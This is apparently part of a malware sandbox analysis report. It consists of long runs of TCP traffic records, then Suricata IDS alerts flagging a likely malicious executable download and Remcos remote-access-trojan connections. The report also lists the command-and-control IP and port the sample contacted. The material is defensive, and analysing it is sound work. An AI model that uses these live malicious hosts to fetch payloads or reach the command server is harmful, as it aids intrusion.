Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80

Networking

Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 104.168.7.25:80 -> 192.168.2.22:49161
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 104.168.7.25:80 -> 192.168.2.22:49161
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 107.173.4.16:2404
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49162 -> 107.173.4.16:2404
Source: C:\Windows\SysWOW64\svchost.exe Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 107.173.4.16 2404
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 178.237.33.50 80
Source: Malware configuration extractor URLs: 107.173.4.16
